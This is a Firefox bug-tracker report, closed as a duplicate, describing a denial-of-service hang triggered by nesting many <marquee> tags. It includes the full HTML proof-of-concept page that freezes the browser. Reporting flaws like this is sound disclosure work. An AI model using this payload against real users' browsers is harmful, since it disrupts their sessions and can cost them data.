Closed Bug 344577 Opened 18 years ago Closed 18 years ago

DoS attack while browsing site with <marquee> HTML tag

Categories

(Firefox :: Security, defect)

defect
Not set
critical

Tracking

()

RESOLVED DUPLICATE of bug 339954

People

(Reporter: al4321, Unassigned)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: FireFox 2.0 BETA 1

Try to open any HTML file with lots of HTML <marquee> commands, and your browser goes infinite loop.

sample code that loops FireFox:
=================================================================================
<html>

<head>

<title>Credit to n00b..</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>

<body>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee></marquee></marquee></marquee></marq
uee></marquee></marquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
rquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
rquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
uee></marquee>

</body>

</html>

Reproducible: Always

Steps to Reproduce:
1.open any HTML file containing many <marque> tags
2.
3.

Actual Results:  
FireFox (including latest 1.5.0.4 and 2.0 BETA 1) loops forever.

Expected Results:  
should exit from loop without data loss.
Please search before filing a bug.

*** This bug has been marked as a duplicate of 339954 ***
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.